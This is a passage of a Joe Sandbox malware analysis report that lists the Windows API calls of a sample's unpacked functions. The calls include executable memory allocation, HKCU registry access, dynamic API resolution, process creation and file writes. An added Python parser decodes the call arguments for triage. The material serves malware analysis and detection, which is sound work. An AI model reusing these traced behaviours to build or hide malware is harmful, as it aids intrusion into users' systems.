                                                            • VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,04BA1C48,00000000), ref: 04BB06C2
                                                            • GetCursorFrameInfo.USER32 ref: 04BB06ED
                                                              • Part of subcall function 04BC3CDF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 04BC3D00
                                                              • Part of subcall function 04BC3CDF: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,?,?,?,04BB0648,00000000,00000000,00000000,00000001,?,00000000), ref: 04BC3D43
                                                            • GetLastError.KERNEL32(?,00000000,04BA1C48,00000000), ref: 04BB06FA
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$AllocAllocateCursorErrorFileFrameHeaderImageInfoLastModuleNameVirtual
                                                            • String ID:
                                                            • API String ID: 3373556483-0
                                                            • Opcode ID: fe120fb098fc41df9fc4d24f3dfff4a445631131bd1b513784340d1ca62209f7
                                                            • Instruction ID: 7dccb40b13ad465a64cddf18799679276ba67d88f9c80066a9b61e2e31ebd324
                                                            • Opcode Fuzzy Hash: fe120fb098fc41df9fc4d24f3dfff4a445631131bd1b513784340d1ca62209f7
                                                            • Instruction Fuzzy Hash: 0C31FB71A00209EFDB11EFA5D881AFE7BB4EB48750F1044A6E946EB250D7B4AD40DFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
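The records in this section are Joe Sandbox's per-function call listings, and their argument columns are raw hex words that still have to be decoded by hand: the VirtualAlloc at 04BB06C2 above asks for 0x01000000 bytes with flAllocationType 00003000 and flProtect 00000040, the RegCreateKeyA at 04BB4612 opens a key under root 80000001, the function ending at 04BBACB6 pairs GetTempFileNameA/CreateDirectoryA with the string "\Low", and the WideCharToMultiByte at 04BB9F08 further down passes code page 0000FDE9. The Python below is an added example, not part of the report or of Joe Sandbox tooling. It parses this record layout (assumed from the text as extracted here), decodes those arguments with the documented Win32 values (0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE, 80000001 = HKEY_CURRENT_USER, 0xFDE9 = CP_UTF8, i.e. 65001), and reports the temp-file call group together with the record's String ID. The embedded sample is a constructed excerpt copied from records on this page with argument lists shortened; it includes a record with no API calls because one such record appears in this section.

```python
"""Parse the per-function API records of a Joe Sandbox report and decode the
argument values an analyst checks by hand. Added example, not part of the
report or of Joe Sandbox: the record layout is assumed from the text above,
the constants are documented Win32 values."""
import re
from collections import namedtuple
from dataclasses import dataclass, field
from typing import Dict, List, Optional

PAGE_EXECUTE_READWRITE, CP_UTF8 = 0x40, 0xFDE9  # 0xFDE9 == 65001
MEM_FLAGS = (("MEM_COMMIT", 0x1000), ("MEM_RESERVE", 0x2000))
HKEY_NAMES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
              0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
HEADERS = ("APIs", "Strings", "Memory Dump Source", "Similarity", "Uniqueness")
# "<name>.<module>(<args>), ref: <addr>", prefixed when the call sits in a callee.
CALL_RE = re.compile(r"^(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?(?P<name>\w+)\.(?P<module>\w+)"
                     r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$")
ApiCall = namedtuple("ApiCall", "name module args ref subcall")  # subcall: callee address or None

@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    source: str = ""                                     # the "Source File:" line
    meta: Dict[str, str] = field(default_factory=dict)   # API ID, String ID, Opcode ID, ...

def parse_arg(tok: str):
    """Hex word -> int ('-' prefix allowed), '?' -> None (unresolved), any other
    token (a literal such as the '=' passed to StrTrimA) -> kept as a string."""
    tok = tok.strip()
    if tok == "?":
        return None
    try:
        return -int(tok[1:], 16) if tok.startswith("-") else int(tok, 16)
    except ValueError:
        return tok

def parse_call(body: str) -> Optional[ApiCall]:
    m = CALL_RE.match(body)
    if not m:
        return None
    args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
    return ApiCall(m["name"], m["module"], args, m["ref"], m["sub"])

def parse_report(text: str) -> List[FunctionRecord]:
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Uniqueness Score"):
            continue
        if line in HEADERS:
            # A record opens at "APIs"; a function with no API calls (one appears in
            # this report) opens at "Memory Dump Source" once the previous one is complete.
            if line == "APIs" or (line == "Memory Dump Source" and (cur is None or cur.source)):
                cur = FunctionRecord()
                records.append(cur)
            section = line
            continue
        if cur is None:
            continue
        body = line.lstrip("• ").strip()
        if section == "APIs":
            call = parse_call(body)
            if call:
                cur.calls.append(call)
        elif section == "Memory Dump Source" and body.startswith("Source File:"):
            cur.source = body[len("Source File:"):].strip()
        elif section == "Similarity":
            key, _, val = body.partition(":")
            cur.meta[key.strip()] = val.strip()
    return records

def triage(rec: FunctionRecord) -> List[str]:
    """Decode the argument values and call groups worth a second look."""
    out, direct = [], [c for c in rec.calls if c.subcall is None]  # only this function's own calls
    for c in direct:
        a = c.args
        if c.name == "VirtualAlloc" and len(a) >= 4 and a[3] == PAGE_EXECUTE_READWRITE:
            size = f"0x{a[1]:X}" if isinstance(a[1], int) else "?"
            kind = "|".join(n for n, v in MEM_FLAGS if isinstance(a[2], int) and a[2] & v) or "?"
            out.append(f"{c.ref}: VirtualAlloc {size} bytes, {kind}, PAGE_EXECUTE_READWRITE")
        elif c.name.startswith("RegCreateKey") and a and a[0] in HKEY_NAMES:
            out.append(f"{c.ref}: {c.name} under {HKEY_NAMES[a[0]]}")
        elif c.name == "WideCharToMultiByte" and a and a[0] == CP_UTF8:
            out.append(f"{c.ref}: WideCharToMultiByte with CP_UTF8")
    if {"GetTempFileNameA", "CreateDirectoryA"} <= {c.name for c in direct}:
        s = rec.meta.get("String ID", "")
        out.append("temp file + directory creation" + (f" (string {s})" if s else ""))
    return out

# Constructed excerpt: records copied from this report, argument lists shortened.
SAMPLE_REPORT = """\
APIs
  • Part of subcall function 04BB90ED: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?), ref: 04BB90FF
• CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000), ref: 04BBAC85
• GetTickCount.KERNEL32 ref: 04BBAC90
• GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365), ref: 04BBAC9C
Strings
Memory Dump Source
• Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
Similarity
• API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
• String ID: \\Low
• Opcode ID: 5d1719a4b44523756ae69cf7de7e306110d090a5304f0a7bd96e9e1d132e5250
Uniqueness

Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 04BB45DE
• wsprintfA.USER32 ref: 04BB45FA
• RegCreateKeyA.ADVAPI32(80000001,04BCC320,00000000), ref: 04BB4612
Memory Dump Source
• Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
Similarity
• String ID:
• Opcode ID: 549602fa735d90e84575be9ab7142e382f018c5d2ecb125fd4eff7e4b6ec0945
Memory Dump Source
• Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
Similarity
• Opcode ID: aacfbdb73c560d389bd5ca5f617350debbb2c91b9088da663ef27184614e5919
APIs
  • Part of subcall function 04BBB54C: GetModuleFileNameW.KERNEL32(?,00000000,00000104), ref: 04BBB572
• VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000), ref: 04BB06C2
Memory Dump Source
• Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
Similarity
• Opcode ID: fe120fb098fc41df9fc4d24f3dfff4a445631131bd1b513784340d1ca62209f7
APIs
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 04BB9F08
"""
```

The triage rules score only a function's own calls: the "Part of subcall function" lines stay on the record with the callee address, but are not attributed to every caller, since the callee has a record of its own in the report. Findings are returned as plain strings so they can be keyed on the record's Opcode ID from `meta` when comparing functions across analyses.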

                                                            APIs
                                                            • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 04BACDE5
                                                            • CreateWaitableTimerA.KERNEL32(04BCC1A8,00000001,?), ref: 04BACE02
                                                            • GetLastError.KERNEL32(?,00000000,04BA7AF7,00000000,00000000,00008008), ref: 04BACE13
                                                              • Part of subcall function 04BB68B2: RegQueryValueExA.KERNEL32(00000000,04BB5AB0,00000000,04BB5AB0,00000000,?,00000000,00000000,00000000,00000001,73B74D40,04BB5AB0,04BB5AB0,?,04BA74AD,?), ref: 04BB68EA
                                                              • Part of subcall function 04BB68B2: RtlAllocateHeap.NTDLL(00000000,?), ref: 04BB68FE
                                                              • Part of subcall function 04BB68B2: RegQueryValueExA.ADVAPI32(00000000,04BB5AB0,00000000,04BB5AB0,00000000,?,?,04BA74AD,?,04BB5AB0,00000000,00000001,00000000,73B74D40), ref: 04BB6918
                                                              • Part of subcall function 04BB68B2: RegCloseKey.ADVAPI32(00000000,?,04BA74AD,?,04BB5AB0,00000000,00000001,00000000,73B74D40,?,?,?,04BB5AB0,00000000), ref: 04BB6942
                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,04BA7AF7,00000000,00000000,00008008), ref: 04BACE53
                                                            • SetWaitableTimer.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000000,04BA7AF7,00000000,00000000,00008008), ref: 04BACE72
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,04BA7AF7,00000000,00000000,00008008), ref: 04BACE88
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
                                                            • String ID:
                                                            • API String ID: 1835239314-0
                                                            • Opcode ID: ba68ad3a9138856c72214416eef67bc5a8c00f2b296668ebe7fd6b480c523abd
                                                            • Instruction ID: f4fdc9622214edd03a592b7fb2dcad65462eff986017ebec2826f7eba107ce85
                                                            • Opcode Fuzzy Hash: ba68ad3a9138856c72214416eef67bc5a8c00f2b296668ebe7fd6b480c523abd
                                                            • Instruction Fuzzy Hash: D7312871904109EBCB20DFA9C8C9CAFBFB9EB89751B208896E545E7100D334BE51CBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • StrChrA.SHLWAPI(00000000,00000020,00000000,?,00000000,?,?,?,04BB3BE7,00000000,?,04BCBAA8,?,?,04BCC140), ref: 04BB86D5
                                                            • StrChrA.SHLWAPI(00000001,00000020,?,?,?,04BB3BE7,00000000,?,04BCBAA8,?,?,04BCC140), ref: 04BB86E6
                                                              • Part of subcall function 04BC29DE: lstrlen.KERNEL32(?,04BA2DC6,00000000,00000000,?,04BBDF3C,?,?,00000014,04BA2DC6,?,?), ref: 04BC29F0
                                                              • Part of subcall function 04BC29DE: StrChrA.SHLWAPI(?,0000000D,?,04BBDF3C,?,?,00000014,04BA2DC6,?,?), ref: 04BC2A28
                                                            • RtlAllocateHeap.NTDLL(00000000,01000000,00000000), ref: 04BB8726
                                                            • memcpy.NTDLL(00000000,?,00000007,?,?,?,04BB3BE7,00000000,?,04BCBAA8,?), ref: 04BB8753
                                                            • memcpy.NTDLL(00000000,04BCC140,04BCC140,00000000,?,00000007,?,?,?,04BB3BE7,00000000,?,04BCBAA8,?), ref: 04BB8762
                                                            • memcpy.NTDLL(04BCC140,?,?,00000000,04BCC140,04BCC140,00000000,?,00000007,?,?,?,04BB3BE7,00000000,?,04BCBAA8), ref: 04BB8774
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: memcpy$AllocateHeaplstrlen
                                                            • String ID:
                                                            • API String ID: 1819133394-0
                                                            • Opcode ID: ec911a7c46bee6049c71dfc0ef7712891c896582fd07ed53ea266da3790836f2
                                                            • Instruction ID: 21f26077c6847cf102141ec3003fb85689b26fbb35b642bbd6de3b722dc8078e
                                                            • Opcode Fuzzy Hash: ec911a7c46bee6049c71dfc0ef7712891c896582fd07ed53ea266da3790836f2
                                                            • Instruction Fuzzy Hash: 47219272500209BFDB119F9ADC84F9ABBACEF1C758F0940A2E944DB151D674EE448BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 04BB9F08
                                                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04BB9F19
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000), ref: 04BB9F34
                                                            • GetLastError.KERNEL32 ref: 04BB9F4A
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04BB9F5C
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04BB9F71
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
                                                            • String ID:
                                                            • API String ID: 1822509305-0
                                                            • Opcode ID: d288a3c9febe8c114dafe2a5e017883da5bca9e7daf389a7202fdbcbd2427440
                                                            • Instruction ID: f432fe5743c170e96e9445b334fe9c4b94f9fabaf219a9f02e8e8a80fd74a547
                                                            • Opcode Fuzzy Hash: d288a3c9febe8c114dafe2a5e017883da5bca9e7daf389a7202fdbcbd2427440
                                                            • Instruction Fuzzy Hash: 7A112E76901118FBDB215BA6DC84CEF7F7DEB492A1B000062F645E2150D675AA51EBF0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RegOpenKeyA.ADVAPI32(80000001,?,73BCF710), ref: 04BBDC2D
                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000), ref: 04BBDC5B
                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04BBDC6D
                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 04BBDC92
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04BBDCAD
                                                            • RegCloseKey.ADVAPI32(?), ref: 04BBDCB7
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: HeapQueryValue$AllocateCloseFreeOpen
                                                            • String ID:
                                                            • API String ID: 170146033-0
                                                            • Opcode ID: 01d41e31acc768f975ffb1ea0ad396f2190caa03e05e65c3974d40039fc1aa6a
                                                            • Instruction ID: c583aa0dd058c186a0ee6eb46730c0bb6c339f4456908ee8d3bbcaf1c79450fd
                                                            • Opcode Fuzzy Hash: 01d41e31acc768f975ffb1ea0ad396f2190caa03e05e65c3974d40039fc1aa6a
                                                            • Instruction Fuzzy Hash: B511E47690010CFFDB11DBA9ED84CEEBBFDEB88604B0441A6E905E3114E375AE55DB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(00000F00,?,-00000001,00000000,?,?,?,04BA3F0E,?,00000000,000000FF,?,00000F00), ref: 04BAB87A
                                                            • lstrlen.KERNEL32(?,?,-00000001,00000000,?,?,?,04BA3F0E,?,00000000,000000FF,?,00000F00), ref: 04BAB881
                                                            • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 04BAB893
                                                            • _snprintf.NTDLL ref: 04BAB8B9
                                                              • Part of subcall function 04BBA976: memset.NTDLL ref: 04BBA98B
                                                              • Part of subcall function 04BBA976: lstrlenW.KERNEL32(00000000,00000000,00000000,?,00000000,?), ref: 04BBA9C4
                                                              • Part of subcall function 04BBA976: wcstombs.NTDLL ref: 04BBA9CE
                                                              • Part of subcall function 04BBA976: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,?,00000000,?), ref: 04BBA9FF
                                                              • Part of subcall function 04BBA976: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04BC1B1D), ref: 04BBAA2B
                                                              • Part of subcall function 04BBA976: TerminateProcess.KERNEL32(?,000003E5), ref: 04BBAA41
                                                              • Part of subcall function 04BBA976: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04BC1B1D), ref: 04BBAA55
                                                              • Part of subcall function 04BBA976: CloseHandle.KERNEL32(?), ref: 04BBAA88
                                                              • Part of subcall function 04BBA976: CloseHandle.KERNEL32(?), ref: 04BBAA8D
                                                            • _snprintf.NTDLL ref: 04BAB8ED
                                                              • Part of subcall function 04BBA976: GetLastError.KERNEL32 ref: 04BBAA59
                                                              • Part of subcall function 04BBA976: GetExitCodeProcess.KERNEL32(?,00000001), ref: 04BBAA79
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF,00000000,000000FF,?,00000F00), ref: 04BAB90A
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
                                                            • String ID:
                                                            • API String ID: 1481739438-0
                                                            • Opcode ID: 4d5e26f21cff24edb987dc02136b7ad40558deb7ae9b3af25655d0fdf74711a0
                                                            • Instruction ID: 701ea9fe04209106d6d3e2b6cef04f78b06e579f3eba0827b4e7f4149f624738
                                                            • Opcode Fuzzy Hash: 4d5e26f21cff24edb987dc02136b7ad40558deb7ae9b3af25655d0fdf74711a0
                                                            • Instruction Fuzzy Hash: 6A11A97250421DBBCF119F54DCC4D9A3F6CEB18364B0A8066FA1997252C675EE209BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • LoadLibraryA.KERNEL32(?,00000000,00000001,00000014,00000020,04BBEF72,00000000,00000001), ref: 04BBE46D
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BBE48C
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BBE4A1
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BBE4B7
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BBE4CD
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BBE4E3
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressProc$AllocateHeapLibraryLoad
                                                            • String ID:
                                                            • API String ID: 2486251641-0
                                                            • Opcode ID: d209ce9f7cd8ef7d3d47d18386880e5ce55379ff228c0d7971b01edc2cf634d3
                                                            • Instruction ID: 5cc379870681fec5b0e3eecb96ad4af8660d51ac0536810576dac369a6bd4970
                                                            • Opcode Fuzzy Hash: d209ce9f7cd8ef7d3d47d18386880e5ce55379ff228c0d7971b01edc2cf634d3
                                                            • Instruction Fuzzy Hash: 521133B260031B9F9720DB69DCC4DB737ECEB0874430A8566F949C7212EA34E905CBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000), ref: 04BB90FF
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?,0000000E), ref: 04BB9118
                                                            • GetCurrentThreadId.KERNEL32 ref: 04BB9125
                                                            • GetSystemTimeAsFileTime.KERNEL32(04BAEE33,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?,0000000E), ref: 04BB9131
                                                            • GetTempFileNameA.KERNEL32(00000000,00000000,04BAEE33,00000000,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?), ref: 04BB913F
                                                            • lstrcpy.KERNEL32(00000000), ref: 04BB9161
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
                                                            • String ID:
                                                            • API String ID: 1175089793-0
                                                            • Opcode ID: 7cc2d2560f4ef5bae91a7aacd43075b8e7cd6080401ca81476bf91c37c2cdcec
                                                            • Instruction ID: f31a956de532f7024c20892ccf8ec3f42e3284383b6751135774b9d3deef5fd3
                                                            • Opcode Fuzzy Hash: 7cc2d2560f4ef5bae91a7aacd43075b8e7cd6080401ca81476bf91c37c2cdcec
                                                            • Instruction Fuzzy Hash: 780161B6A002157B97115BB6DCCCDBB7BBCDF89B40B054066BB05E3201DA68F81596B0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memcpy.NTDLL(?,04BB6BB6,00000000,?,?,?,04BB6BB6,?,?,?,?,?), ref: 04BA176F
                                                            • lstrlen.KERNEL32(04BB6BB6,?,?,?,04BB6BB6,?,?,?,?,?), ref: 04BA178D
                                                            • memcpy.NTDLL(?,?,?,?,?,?,?), ref: 04BA17FC
                                                            • lstrlen.KERNEL32(04BB6BB6,00000000,00000000,?,?,?,04BB6BB6,?,?,?,?,?), ref: 04BA181D
                                                            • lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 04BA1831
                                                            • memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 04BA183A
                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 04BA1848
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlenmemcpy$FreeLocal
                                                            • String ID:
                                                            • API String ID: 1123625124-0
                                                            • Opcode ID: f89e3e788bc3d01271ea34252163a0b0bc42372838b7e13d4d8c92e1dba1bdf1
                                                            • Instruction ID: a720038f062ae57024d58c07fd4cfbdc84589177af89f0c8e998d5971bb4f674
                                                            • Opcode Fuzzy Hash: f89e3e788bc3d01271ea34252163a0b0bc42372838b7e13d4d8c92e1dba1bdf1
                                                            • Instruction Fuzzy Hash: EA41E9B280421AABDF10DF69DC819DB3BA8EF182A4F054465FD14A7210E735EE64CBE1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memcpy.NTDLL(?,04BB5AB0,00000010,?,?,?,?,?,?,?,?,?,?,04BC3452,00000000,00000001), ref: 04BBBEE0
                                                            • memcpy.NTDLL(00000000,00000001,04BB5AB0,0000011F), ref: 04BBBF73
                                                            • GetLastError.KERNEL32(?,?,0000011F), ref: 04BBBFCB
                                                            • GetLastError.KERNEL32 ref: 04BBBFFD
                                                            • GetLastError.KERNEL32 ref: 04BBC011
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,04BC3452,00000000,00000001,04BB5AB0,?,04BB5AB0), ref: 04BBC026
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorLast$memcpy
                                                            • String ID:
                                                            • API String ID: 2760375183-0
                                                            • Opcode ID: dece40112129d138d4883a13521b1116a2cf5deada80207fa9c44186769dc9f7
                                                            • Instruction ID: 9987e350e84603d2aeb0bf4d85ccf08c1160822409f90fc921ae51eed8bdc9aa
                                                            • Opcode Fuzzy Hash: dece40112129d138d4883a13521b1116a2cf5deada80207fa9c44186769dc9f7
                                                            • Instruction Fuzzy Hash: E3512B71904208FFDB10DFA9D884AEEBBB9EB08354F10846AF951E7240E775AE54DF60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04BA2B55: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,770F4620,00000000,00000000,04BA114F,?), ref: 04BA2B66
                                                              • Part of subcall function 04BA2B55: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000), ref: 04BA2B83
                                                            • lstrlenW.KERNEL32(00000000,00000000,73B006E0,?,?,80000001,?), ref: 04BBF0C7
                                                            • lstrlenW.KERNEL32(00000008), ref: 04BBF0CE
                                                            • lstrlenW.KERNEL32(?,?), ref: 04BBF0EA
                                                            • lstrlen.KERNEL32(?,?,00000000), ref: 04BBF164
                                                            • lstrlenW.KERNEL32(?), ref: 04BBF170
                                                            • wsprintfA.USER32 ref: 04BBF19E
                                                              • Part of subcall function 04BC3C4A: RtlFreeHeap.NTDLL(00000000,?,04BA30B5,00000000,?,00000104,04BC0BF9,?,00000250,?,00000000), ref: 04BC3C56
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$EnvironmentExpandStrings$FreeHeapwsprintf
                                                            • String ID:
                                                            • API String ID: 3384896299-0
                                                            • Opcode ID: 44b16b45f4f8b222521fb3ea2b5af2f7c31c4d2d33e6f70c07d9f910278bcdec
                                                            • Instruction ID: 837841175ec13438c9969460a4be739368bc6cdf750391f5373fe3d41132162b
                                                            • Opcode Fuzzy Hash: 44b16b45f4f8b222521fb3ea2b5af2f7c31c4d2d33e6f70c07d9f910278bcdec
                                                            • Instruction Fuzzy Hash: 66416171900209EFDF01AFA8DC84DFE7BB9EF48204B058496F915E7211EB75EA249F60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04BC0C11
                                                              • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04BC0C1D
                                                              • Part of subcall function 04BC0BC5: memset.NTDLL ref: 04BC0C65
                                                              • Part of subcall function 04BC0BC5: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04BC0C80
                                                              • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(0000002C), ref: 04BC0CB8
                                                              • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(?), ref: 04BC0CC0
                                                              • Part of subcall function 04BC0BC5: memset.NTDLL ref: 04BC0CE3
                                                              • Part of subcall function 04BC0BC5: wcscpy.NTDLL ref: 04BC0CF5
                                                            • WaitForSingleObject.KERNEL32(00000000,?,05C8993C,?,00000000,00000000,00000001), ref: 04BAA961
                                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04BAA99B
                                                            • RegCloseKey.ADVAPI32(?), ref: 04BAA9C7
                                                            • WaitForSingleObject.KERNEL32(00000000,Function_00008936,04BCC1E4), ref: 04BAAA2B
                                                            • RtlExitUserThread.NTDLL(?), ref: 04BAAA61
                                                              • Part of subcall function 04BB5EFC: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,04BB5A38,00000000,?,?), ref: 04BB5F1A
                                                              • Part of subcall function 04BB5EFC: GetFileSize.KERNEL32(00000000,00000000,?,?,04BB5A38,00000000,?,?,?,?,00000000,04BADBFF,?,?,?,?), ref: 04BB5F2A
                                                              • Part of subcall function 04BB5EFC: CloseHandle.KERNEL32(000000FF,?,?,04BB5A38,00000000,?,?,?,?,00000000,04BADBFF,?,?,?,?,00000000), ref: 04BB5F8C
                                                              • Part of subcall function 04BB533D: CreateFileW.KERNEL32(00000000,C0000000,04BBF1B3,00000000,04BBF1B4,00000080,00000000,00000000,04BC4C6A,00000000,04BBF1B3,?), ref: 04BB537E
                                                              • Part of subcall function 04BB533D: GetLastError.KERNEL32 ref: 04BB5388
                                                              • Part of subcall function 04BB533D: WaitForSingleObject.KERNEL32(000000C8), ref: 04BB53AD
                                                              • Part of subcall function 04BB533D: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 04BB53CE
                                                              • Part of subcall function 04BB533D: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 04BB53F6
                                                              • Part of subcall function 04BB533D: WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 04BB540B
                                                              • Part of subcall function 04BB533D: SetEndOfFile.KERNEL32(00000001), ref: 04BB5418
                                                              • Part of subcall function 04BB533D: CloseHandle.KERNEL32(00000001), ref: 04BB5430
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: File$lstrlen$CloseCreateObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerSizeThreadUserWritewcscpy
